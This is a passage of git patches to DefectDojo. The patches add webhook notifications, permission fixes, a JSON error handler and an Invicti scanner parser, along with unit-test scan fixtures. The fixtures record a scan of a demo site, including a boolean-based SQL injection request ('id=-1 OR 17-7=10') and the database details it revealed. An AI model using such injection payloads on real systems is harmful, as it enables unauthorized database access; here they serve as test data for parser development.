HttpResponseRedirect(reverse("notification_webhooks")) + # Add any breadcrumbs + request = self.set_breadcrumbs(request) + # Render the page + return render(request, self.template, context) diff --git a/dojo/product/signals.py b/dojo/product/signals.py index 6871f5490d2..72e9771e82c 100644 --- a/dojo/product/signals.py +++ b/dojo/product/signals.py @@ -16,7 +16,9 @@ def product_post_save(sender, instance, created, **kwargs): create_notification(event="product_added", title=instance.name, product=instance, - url=reverse("view_product", args=(instance.id,))) + url=reverse("view_product", args=(instance.id,)), + url_api=reverse("product-detail", args=(instance.id,)), + ) @receiver(post_delete, sender=Product) diff --git a/dojo/product_type/signals.py b/dojo/product_type/signals.py index dde3ff502cd..743995768eb 100644 --- a/dojo/product_type/signals.py +++ b/dojo/product_type/signals.py @@ -16,7 +16,9 @@ def product_type_post_save(sender, instance, created, **kwargs): create_notification(event="product_type_added", title=instance.name, product_type=instance, - url=reverse("view_product_type", args=(instance.id,))) + url=reverse("view_product_type", args=(instance.id,)), + url_api=reverse("product_type-detail", args=(instance.id,)), + ) @receiver(post_delete, sender=Product_Type) diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index 878a104af54..4686d63afe2 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -5adedc433a342d675492b86dc18786f72e167115f9718a397dc9b91c5fdc9c94 +8cd4668bdc4dec192dd5bd3fd767b87a4f6d5441ae8d4a001d2ba61c452e59aa diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index ebf0283dd6a..3a01d935431 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1142,6 +1142,10 @@ def saml2_attrib_map_format(dict): "task": "dojo.risk_acceptance.helper.expiration_handler", "schedule": crontab(minute=0, hour="*/3"), # every 3 hours }, + "notification_webhook_status_cleanup": { + "task": "dojo.notifications.helper.webhook_status_cleanup", + "schedule": timedelta(minutes=1), + }, # 'jira_status_reconciliation': { # 'task': 'dojo.tasks.jira_status_reconciliation_task', # 'schedule': timedelta(hours=12), @@ -1152,7 +1156,6 @@ def saml2_attrib_map_format(dict): # 'schedule': timedelta(hours=12) # }, - } # ------------------------------------ diff --git a/dojo/templates/base.html b/dojo/templates/base.html index 765ec10dc55..722656ae6a9 100644 --- a/dojo/templates/base.html +++ b/dojo/templates/base.html @@ -541,6 +541,13 @@ {% trans "Notifications" %} + {% if system_settings.enable_webhooks_notifications and "dojo.view_notification_webhooks"|has_configuration_permission:request %} +
  • + + {% trans "Notification Webhooks" %} + +
  • + {% endif %}
  • {% trans "Regulations" %} diff --git a/dojo/templates/dojo/add_notification_webhook.html b/dojo/templates/dojo/add_notification_webhook.html new file mode 100644 index 00000000000..12056373af4 --- /dev/null +++ b/dojo/templates/dojo/add_notification_webhook.html @@ -0,0 +1,13 @@ +{% extends "base.html" %} +{% block content %} + {{ block.super }} +

    Add a new Notification Webhook

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/delete_notification_webhook.html b/dojo/templates/dojo/delete_notification_webhook.html new file mode 100644 index 00000000000..f196ad94fc9 --- /dev/null +++ b/dojo/templates/dojo/delete_notification_webhook.html @@ -0,0 +1,12 @@ +{% extends "base.html" %} +{% block content %} +

    Delete Notification Webhook

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + +
    +
    +
    +{% endblock %} diff --git a/dojo/templates/dojo/edit_notification_webhook.html b/dojo/templates/dojo/edit_notification_webhook.html new file mode 100644 index 00000000000..94bd56c2307 --- /dev/null +++ b/dojo/templates/dojo/edit_notification_webhook.html @@ -0,0 +1,15 @@ +{% extends "base.html" %} + {% block content %} + {{ block.super }} +

    Edit Notification Webhook

    +
    {% csrf_token %} + {% include "dojo/form_fields.html" with form=form %} +
    +
    + + +
    +
    +
    + {% endblock %} + \ No newline at end of file diff --git a/dojo/templates/dojo/notifications.html b/dojo/templates/dojo/notifications.html index 52d87393c45..81fac49d5cc 100644 --- a/dojo/templates/dojo/notifications.html +++ b/dojo/templates/dojo/notifications.html @@ -89,6 +89,9 @@

    {% if 'mail' in enabled_notifications %} {% trans "Mail" %} {% endif %} + {% if 'webhooks' in enabled_notifications %} + {% trans "Webhooks" %} + {% endif %} {% trans "Alert" %} diff --git a/dojo/templates/dojo/system_settings.html b/dojo/templates/dojo/system_settings.html index 693abe712f0..02510452e16 100644 --- a/dojo/templates/dojo/system_settings.html +++ b/dojo/templates/dojo/system_settings.html @@ -62,7 +62,7 @@

    System Settings

    } $(function () { - $.each(['slack','msteams','mail', 'grade'], function (index, value) { + $.each(['slack','msteams','mail','webhooks','grade'], function (index, value) { updatenotificationsgroup(value); $('#id_enable_' + value + '_notifications').change(function() { updatenotificationsgroup(value)}); }); diff --git a/dojo/templates/dojo/view_notification_webhooks.html b/dojo/templates/dojo/view_notification_webhooks.html new file mode 100644 index 00000000000..6b02c0888d3 --- /dev/null +++ b/dojo/templates/dojo/view_notification_webhooks.html @@ -0,0 +1,101 @@ +{% extends "base.html" %} +{% load navigation_tags %} +{% load display_tags %} +{% load i18n %} +{% load authorization_tags %} +{% block content %} + {{ block.super }} +
    +{% endblock %} +{% block postscript %} + {{ block.super }} + {% include "dojo/filter_js_snippet.html" %} +{% endblock %} diff --git a/dojo/templates/dojo/view_product_details.html b/dojo/templates/dojo/view_product_details.html index 30dd863fc3c..076215121f5 100644 --- a/dojo/templates/dojo/view_product_details.html +++ b/dojo/templates/dojo/view_product_details.html @@ -668,7 +668,7 @@

    Edit Custom Fields

  • - -
  • - - Add Scan API Configuration - -
  • + {% endif %} + + {% if prod|has_object_permission:"Product_API_Scan_Configuration_Edit" %}
  • - - View Scan API Configurations - + + Add Scan API Configuration +
  • {% endif %} +
  • + + View Scan API Configurations + +
  • {% if system_settings.enable_product_tracking_files %} {% if prod|has_object_permission:"Product_Tracking_Files_Add" %} diff --git a/dojo/templates/dojo/view_product_details.html b/dojo/templates/dojo/view_product_details.html index 30dd863fc3c..0005dc3fbbc 100644 --- a/dojo/templates/dojo/view_product_details.html +++ b/dojo/templates/dojo/view_product_details.html @@ -41,19 +41,21 @@

    {% trans "Description" %}

    {% trans "Edit Custom Fields" %} - -
  • - - {% trans "Add API Scan Configuration" %} - -
  • + {% endif %} + + {% if prod|has_object_permission:"Product_API_Scan_Configuration_Add" %}
  • - - {% trans "View API Scan Configurations" %} - + + {% trans "Add API Scan Configuration" %} +
  • {% endif %} +
  • + + {% trans "View API Scan Configurations" %} + +
  • {% if system_settings.enable_product_tracking_files %} {% if prod|has_object_permission:"Product_Tracking_Files_Add" %} From 885029c7ccc1fc8225412caf45bc7136a4d5da11 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:31:47 -0500 Subject: [PATCH 10/62] JSON Parsing Errors: Make errors less verbose (#10891) * JSON Parsing Errors: Make errors less verbose * Only intercept when JSON is invalid --- dojo/api_v2/exception_handler.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/dojo/api_v2/exception_handler.py b/dojo/api_v2/exception_handler.py index 513c98004b7..8f395026b03 100644 --- a/dojo/api_v2/exception_handler.py +++ b/dojo/api_v2/exception_handler.py @@ -2,6 +2,7 @@ from django.core.exceptions import ValidationError from django.db.models.deletion import RestrictedError +from rest_framework.exceptions import ParseError from rest_framework.response import Response from rest_framework.status import ( HTTP_400_BAD_REQUEST, @@ -20,7 +21,11 @@ def custom_exception_handler(exc, context): # to get the standard error response. response = exception_handler(exc, context) - if isinstance(exc, RestrictedError): + if isinstance(exc, ParseError) and "JSON parse error" in str(exc): + response = Response() + response.status_code = HTTP_400_BAD_REQUEST + response.data = {"message": "JSON request content is malformed"} + elif isinstance(exc, RestrictedError): # An object cannot be deleted because it has dependent objects. response = Response() response.status_code = HTTP_409_CONFLICT From 5d2e728fd49843ce79d78d058faf72a5394f37e4 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:32:41 -0500 Subject: [PATCH 11/62] Add support for Invicti parser through Netsparker (#10894) * Add support for Invicti parser through Netsparker * update settings sha * Rename unit test files * Update docs/content/en/integrations/parsers/file/netsparker.md Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- .../en/integrations/parsers/file/invicti.md | 9 + .../integrations/parsers/file/netsparker.md | 3 + dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 + dojo/tools/invicti/__init__.py | 0 dojo/tools/invicti/parser.py | 20 + .../scans/invicti/invicti_many_findings.json | 4681 +++++++++++++++++ .../scans/invicti/invicti_one_finding.json | 85 + .../scans/invicti/invicti_zero_finding.json | 10 + unittests/scans/invicti/issue_10311.json | 173 + unittests/scans/invicti/issue_9816.json | 173 + unittests/tools/test_invicti_parser.py | 98 + 12 files changed, 5255 insertions(+), 1 deletion(-) create mode 100644 docs/content/en/integrations/parsers/file/invicti.md create mode 100644 dojo/tools/invicti/__init__.py create mode 100644 dojo/tools/invicti/parser.py create mode 100644 unittests/scans/invicti/invicti_many_findings.json create mode 100644 unittests/scans/invicti/invicti_one_finding.json create mode 100644 unittests/scans/invicti/invicti_zero_finding.json create mode 100644 unittests/scans/invicti/issue_10311.json create mode 100644 unittests/scans/invicti/issue_9816.json create mode 100644 unittests/tools/test_invicti_parser.py diff --git a/docs/content/en/integrations/parsers/file/invicti.md b/docs/content/en/integrations/parsers/file/invicti.md new file mode 100644 index 00000000000..c0ffda1a48e --- /dev/null +++ b/docs/content/en/integrations/parsers/file/invicti.md @@ -0,0 +1,9 @@ +--- +title: "Invicti" +toc_hide: true +--- +Vulnerabilities List - JSON report + +### Sample Scan Data + +Sample Invicti scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/invicti). diff --git a/docs/content/en/integrations/parsers/file/netsparker.md b/docs/content/en/integrations/parsers/file/netsparker.md index 7e46af07b12..0be436e185b 100644 --- a/docs/content/en/integrations/parsers/file/netsparker.md +++ b/docs/content/en/integrations/parsers/file/netsparker.md @@ -4,5 +4,8 @@ toc_hide: true --- Vulnerabilities List - JSON report +[Netsparker has now become Invicti](https://www.invicti.com/blog/news/netsparker-is-now-invicti-signaling-a-new-era-for-modern-appsec/). Please plan to migrate automation scripts to use the [Invicti Scan](../invicti.md) + ### Sample Scan Data + Sample Netsparker scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/netsparker). \ No newline at end of file diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index 878a104af54..b6e48ee437c 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -5adedc433a342d675492b86dc18786f72e167115f9718a397dc9b91c5fdc9c94 +1a74292fc58b2bd05c763c8c126b0b35888e2a6f8ef9ab2588bb6c8589987c9c diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index ebf0283dd6a..41f0631fa43 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1279,6 +1279,7 @@ def saml2_attrib_map_format(dict): "AppCheck Web Application Scanner": ["title", "severity"], "Legitify Scan": ["title", "endpoints", "severity"], "ThreatComposer Scan": ["title", "description"], + "Invicti Scan": ["title", "description", "severity"], } # Override the hardcoded settings here via the env var @@ -1503,6 +1504,7 @@ def saml2_attrib_map_format(dict): "AppCheck Web Application Scanner": DEDUPE_ALGO_HASH_CODE, "Legitify Scan": DEDUPE_ALGO_HASH_CODE, "ThreatComposer Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, + "Invicti Scan": DEDUPE_ALGO_HASH_CODE, } # Override the hardcoded settings here via the env var diff --git a/dojo/tools/invicti/__init__.py b/dojo/tools/invicti/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/invicti/parser.py b/dojo/tools/invicti/parser.py new file mode 100644 index 00000000000..93854d9a2dd --- /dev/null +++ b/dojo/tools/invicti/parser.py @@ -0,0 +1,20 @@ +from dojo.tools.netsparker.parser import NetsparkerParser + + +class InvictiParser(NetsparkerParser): + def get_scan_types(self): + return ["Invicti Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Invicti Scan" + + def get_description_for_scan_types(self, scan_type): + return "Invicti JSON format." + + def get_findings(self, filename, test): + """Extended the NetSparker Parser since the Invicti is the a renamed version of Netsparker. + + If there are deviations from the two report formats in the future, then this + function can be implemented then. + """ + return super().get_findings(filename, test) diff --git a/unittests/scans/invicti/invicti_many_findings.json b/unittests/scans/invicti/invicti_many_findings.json new file mode 100644 index 00000000000..c1a1bef7786 --- /dev/null +++ b/unittests/scans/invicti/invicti_many_findings.json @@ -0,0 +1,4681 @@ +{ + "Generated": "25/06/2021 10:00 AM", + "Target": { + "Duration": "00:12:24.8161163", + "Initiated": "25/06/2021 01:46 AM", + "ScanId": "ee9136920f6243486d12ad5104e2f745", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t\t\t\t\t

    Login Area

    \n\t\t\t\t\t

    \n Enter your credentials (admin / admin123456)\n
    \n

    \n Username: \n
    \n Password:  \n\n\n
    \n\t \n
    \n \n
    \n

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \nv\n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    4. \n
    \n
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "66", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "89", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "19" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.

    \n

    This is an extremely common vulnerability and its successful exploitation can have critical implications.

    \n

    Netsparker Enterprise confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Netsparker Enterprise to identify and confirm the SQL injection.

    Proof of Exploit

    Identified Database Name

    sqlibench

    Identified Database User

    root@localhost

    Identified Database Version

    5.0.51b-community-nt-log
    ", + "ExploitationSkills": "
    There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
    ", + "ExternalReferences": "", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t

    Artist Service

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\t\t\t\t\t

    \n \n

    Results: -1 OR 17-7=10


    \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    IDNameSURNAMECREATION DATE
    2 NICK WAHLBERG 2006-02-15 04:34:33
    3 ED CHASE 2006-02-15 04:34:33
    4 JENNIFER DAVIS 2006-02-15 04:34:33
    5 JOHNNY LOLLOBRIGIDA 2006-02-15 04:34:33
    6 BETTE NICHOLSON 2006-02-15 04:34:33
    7 GRACE MOSTEL 2006-02-15 04:34:33
    8 MATTHEW JOHANSSON 2006-02-15 04:34:33
    9 JOE SWANK 2006-02-15 04:34:33
    10 CHRISTIAN GABLE 2006-02-15 04:34:33
    11 ZERO CAGE 2006-02-15 04:34:33
    12 KARL BERRY 2006-02-15 04:34:33
    13 UMA WOOD 2006-02-15 04:34:33
    14 VIVIEN BERGEN 2006-02-15 04:34:33
    15 CUBA OLIVIER 2006-02-15 04:34:33
    16 FRED COSTNER 2012-03-13 12:14:54 22
    17 HELEN VOIGHT 2012-03-13 12:14:54 22
    18 DAN TORN 2012-03-13 12:14:54 22
    19 BOB FAWCETT 2012-03-13 12:14:54 22
    20 LUCILLE TRACY 2012-03-13 12:14:54 22
    21 KIRSTEN PALTROW 2012-03-13 12:14:54 22
    22 ELVIS MARX 2012-03-13 12:14:54 22
    23 SANDRA KILMER 2012-03-13 12:14:54 22
    24 CAMERON STREEP 2012-03-13 12:14:54 22
    25 KEVIN BLOOM 2012-03-13 12:14:54 22
    26 RIP CRAWFORD 2012-03-13 12:14:54 22
    27 JULIA MCQUEEN 2012-03-13 12:14:54 22
    28 WOODY HOFFMAN 2012-03-13 12:14:54 22
    29 ALEC WAYNE 2012-03-13 12:14:54 22
    30 SANDRA PECK 2012-03-13 12:14:54 22
    31 SISSY SOBIESKI 2012-03-13 12:14:54 22
    32 TIM HACKMAN 2012-03-13 12:14:54 22
    33 MILLA PECK 2012-03-13 12:14:54 22
    34 AUDREY OLIVIER 2012-03-13 12:14:54 22
    35 JUDY DEAN 2012-03-13 12:14:54 22
    36 BURT DUKAKIS 2012-03-13 12:14:54 22
    37 VAL BOLGER 2012-03-13 12:14:54 22
    38 TOM MCKELLEN 2012-03-13 12:14:54 22
    39 GOLDIE BRODY 2012-03-13 12:14:54 22
